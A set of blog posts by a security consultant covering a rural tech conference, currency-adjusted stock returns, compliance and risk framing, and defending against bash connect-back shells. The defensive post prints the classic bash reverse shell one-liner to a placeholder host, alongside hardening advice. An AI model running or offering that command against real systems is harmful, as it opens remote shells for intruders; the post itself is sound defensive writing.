Speaking at HickTech

I’m always interested in finding new ways that people are looking at risk and information security. To that end, I’m making the trip today up to Owen Sound, ON to participate in HickTech. I was supposed to be a part of it last year, but missed out due to a scheduling conflict.

This year, I’m excited to talk to a whole bunch of people about the way that business and government in rural areas are dealing with information security and risk management. While I’m going there to speak, I hope to learn a great deal, as well.

And, with a schedule like this one, how could I not? Topics like “Agri-Food Traceability” and the challenges of deploying broadband to rural environments are definitely new to me.

Risk and Understanding All the Variables

One of the things that drives me the most insane is when data is presented as information without properly considering all of the variables. Over dinner with Martin a few weeks ago, I got off on a rant about an example of this. My target that night was the Dow Jones Industrial Average, which we hear about every time we turn on the financial news.

The Dow is a single point of data within the larger sea of the economy. And, unfortunately, it presents a relatively skewed picture of the actual state of economic progress. It has exasperated me most over the past couple of years, with the 2006-2007 pseudo-bull market that had every financial analyst talking about economic prosperity. (For example, see articles here, here, here, etc.)

Unfortunately, it’s pretty easy (about two hours of research and Excel mojo) to show the illusory nature of the “bull market” we have seen over the past four years. The US government has pursued an aggressive strategy of currency devaluation since 2002, and that plays heavily into the price of any asset denominated in USD (e.g. the Dow). To understand the true state of the Dow, one must take into account all of the variables – in this case, the value of the currency in which the price of the market is quoted.

[Chart: the Dow, raw and adjusted for the euro]

Martin would point out that this is a somewhat naive analysis, as I have only adjusted for one currency. To do a more robust analysis, we would have to average the currency impact across world regions, including the Chinese yuan, Canadian dollar, and British pound. However, even with a simple analysis, the results show a staggering change. While the DJIA enjoyed a raw increase of approximately 75% between 2003 and 2008, when adjusted for changes in currency value against the euro, that increase drops to 35%.

This is significant – assuming you got in at the absolute low (Feb 2003) and out at the peak in each case, your actual annual rate of return on the investment drops from 11.7% when looking only at the DJIA to 6.3% when adjusting for currency.
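For the curious, here’s the back-of-the-envelope math behind those annualized figures – just a sketch, assuming a flat five-year holding period and the round 75%/35% totals from above, so the output lands near (rather than exactly on) the 11.7% and 6.3% numbers, which depend on the precise entry and exit dates:

# annualized return = (1 + total return)^(1/years) - 1
echo 'e(l(1.75)/5) - 1' | bc -l    # raw DJIA, +75% over ~5 years: ~0.118, i.e. roughly 11.8%/yr
echo 'e(l(1.35)/5) - 1' | bc -l    # euro-adjusted, +35% over ~5 years: ~0.062, i.e. roughly 6.2%/yr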

And I didn’t even factor in goods/services inflation or taxes. If I had, you would see that the currency loss here is the difference between making a profit and just barely breaking even on the investment.

Why am I talking about all this random financial stuff on a blog dedicated to risk and security (especially when I’m not an accountant)? Because this IS risk. This is the same kind of calculation that we make every day, and it is the same sort of mistake that I see risk management professionals make all the time. When calculating risk, we have a tendency to look only at the simple numbers – humans just aren’t good at multivariate analysis, especially in our heads. So, we have a tendency to look for simple answers, often resorting to the Tarzan method:

Dow up, good. Dow down, bad.

Unfortunately, it’s never quite that simple. If you don’t take into account all of the variables when considering the risk of your investments (whether financial, information security, or otherwise), you’re likely to significantly misread the potential for return on those investments.

Weak Application Security = Non-Compliance

I had to post about this one – our general counsel and compliance specialist Dave Stampley wrote an article recently at Information Week about the importance of ensuring application security as part of your regulatory compliance efforts. From the article:

Web-application security vulnerabilities pose a unique compliance risk for companies. Unlike compliance failures that take place in the background–for example, an unencrypted business-to-business transmission of sensitive consumer data–application weaknesses are open to discovery by any skilled Web surfer and even consumers themselves.

“The FTC appears to be taking a strict liability approach to E-commerce security flaws,” says Mary Ellen Callahan, an attorney at Hogan & Hartson in Washington, D.C., who has represented clients facing government privacy compliance investigations. “White-hat hackers and tipsters have prompted a number of enforcement actions by reporting Web-site flaws they discovered.”

Read the full article here

Whose Risk?

I often get frustrated when we talk about risk, measurement, metrics, and (my new least favorite buzzword) “key performance indicators”, because we (as an industry) have a tendency to drop the audience from the statement of risk.

That may sound confusing, but I’ll illustrate by example. This is a real sentence that I hear far too often:

Doing that presents too much risk.

Unfortunately, that sentence is linguistically incomplete. The concept of “risk” requires specification of the audience – risk to whom/what? This is similar to the problem Lakoff presents in Whose Freedom? – certain concepts require a reference to the audience in order to make sense. Leaving the audience unspecified is productive in marketing (or politics), but it creates massive confusion when you’re actually trying to have real, productive discourse.

A recent post at Security Retentive illustrates the kind of confusion that ensues when the audience for risk metrics/measurements isn’t specified. (I have also previously talked (ranted?) about this type of confusion here and here.)

This confusion fundamentally stems from forgetting that risk is relative to an audience. Without a stated perspective, each person in the discussion applies the “risk” to their own situation and comes away with a radically different meaning.

So when we talk about, measure, or attempt to specify risk, we need to always tie the data/information to a relevant audience: stating risk to what/whom is an important way of ensuring that we don’t remain mired in the kind of confusion that Security Retentive talked about.

Connect-back Shell – Defending the Box

Far be it from us to talk about offense without a corresponding defensive post. Cris’ post yesterday got some attention from a few other blogs (here, here, and here for starters), but it wasn’t the entire story. While we discover a lot of these methods in our penetration tests and application assessments, Neohapsis is, first and foremost, about protecting our customers. So, when you see us post something about cool new offensive methods (as I’m sure you will quite often), you can always expect someone to chime in with defense.

Today, that person is me.

Preventing the Connect-Back Shell

I’ll start with the obvious one: keep your device from being compromised. The connect-back bash trick only comes into play after a host is compromised, as a way of allowing easy continued access. Thus, if the device isn’t compromised in the first place, this never happens.

Alright, that was too simple. Let’s talk about preventing the connect-back itself once a compromise happens.

What Cris wrote about isn’t new. This method of using bash to provide easy access to sockets has been known for quite some time – it’s easy to find on the blogosphere, in articles here and here for example. Since this is built into bash by default in most builds, the main method of prevention is the one Cris hinted at in his article – if you’re on a system that you believe could be compromised, or that you simply want to harden, you have to recompile bash to remove the /dev/tcp and /dev/udp redirects.
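For reference, the commonly circulated form of the trick (Cris’ exact variant may differ) and the rebuild step look roughly like this. Treat it as a sketch: the host, port, and configure flag below are placeholders from memory, so check ./configure --help in your own bash source tree before relying on it.

# the classic bash connect-back: push an interactive shell out to a remote listener
# (10.0.0.1 and 4444 stand in for the attacker's host and port)
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

# rebuilding bash without the /dev/tcp and /dev/udp redirects
# (--disable-net-redirections is, to my knowledge, the relevant configure switch)
./configure --disable-net-redirections && make && sudo make install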

Come to think of it, though… if the box is worth hardening to that level, why have bash on the box at all? Or, at the very least, why not set all users’ shells to rbash and restrict them from accessing the redirection operators that make this possible?
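As a sketch of that last idea: a restricted bash refuses the output-redirection operators (>, >&, and friends) that the connect-back relies on. The account name below is a placeholder, and rbash availability and location vary by distribution – some setups also require adding it to /etc/shells first.

# make a restricted shell available if the distro doesn't already ship one
sudo ln -s /bin/bash /bin/rbash

# give a limited account the restricted shell as its login shell
# (you may need to add /bin/rbash to /etc/shells for chsh to accept it)
sudo chsh -s /bin/rbash webappuser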

Mitigation of the Issue

Since this trick lives in bash, it’s entirely within user space, so there are things we can do at the kernel level to mitigate the attack. The first one that comes to mind is ensuring that the target host has a decent packet filter on it – that should probably be part of most system hardening in the first place. If we’re talking about a system with a well-known service profile (e.g. a web server), allowing arbitrary client-initiated outbound connections to the Internet probably isn’t the best of ideas. So, set up a packet filter on the box that allows only the connections you know are required.
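Here’s a rough sketch of what that could look like with iptables on a Linux web server – a default-deny egress policy with a couple of explicit exceptions. The resolver address and ports are placeholders; adapt the rules to the services your box actually needs.

# drop all outbound traffic by default
iptables -P OUTPUT DROP
# allow loopback traffic
iptables -A OUTPUT -o lo -j ACCEPT
# allow replies to established connections (e.g. responses to inbound port 80 requests)
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# explicitly permit only the outbound services the host truly needs, e.g. DNS to a known resolver
iptables -A OUTPUT -p udp --dport 53 -d 10.0.0.53 -j ACCEPT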

Okay… that’s just a couple of ideas. If you have other ideas, please post them in the comments section. We’d love to hear any discussion or thoughts on how to mitigate this.

Joining together

Another great development at RSA was the opportunity to meet the team from Securac (also known as Certus). For those who don’t know, Neohapsis acquired Securac a couple of weeks ago.

Being at RSA gave us the opportunity to have a fantastic dinner where members of both teams talked, laughed, and had a few drinks together. It’s clear that there’s a fit here – an outsider couldn’t have known who came from which company.

The New Neo Team

While I have often been an outspoken critic of mergers and acquisitions as a means of improving a business, there are times when it actually works. This seems like one of those times – after spending a few hours with the members of the Securac team, it’s clear there’s a cultural fit as well as an incredible meshing of vision and goals.

It’s going to be fun working with this team. Welcome to all of my new teammates.

Willful Blindness

RSA is always a time of endless meetings and endless discoveries of new products. Walking the floor this year has been incredibly frustrating and enlightening at the same time (which I’ll expound on in another post). But with a role entirely dedicated to evaluating products, I keep having conversations that start something like this:

My new {software/hardware/application/appliance/token} is so cool and revolutionary. It does something you’ve never seen any other product do!

That person then goes on to describe a feature that already exists in every product in the space – most of which do whatever the person has described ten times better and more effectively.

Unfortunately, I don’t have the heart to break it to them that their product is, well… lacking. But it always makes me wonder: did this person Google whether the feature existed when they had the blinding flash of inspiration that led them to develop this (not at all) novel breakthrough?

What interests me most is the idea that they did – if they didn’t bother to do their research, it’s just ignorance. But if they did, and still believe it’s novel, that suggests a willful (though potentially unconscious) blindness to the lack of novelty in their ideas. It’s as though (to use an overused and somewhat disturbing colloquialism) they have drunk the Kool-Aid of their own invention to the point that they’re absolutely unable to see that their product isn’t particularly interesting.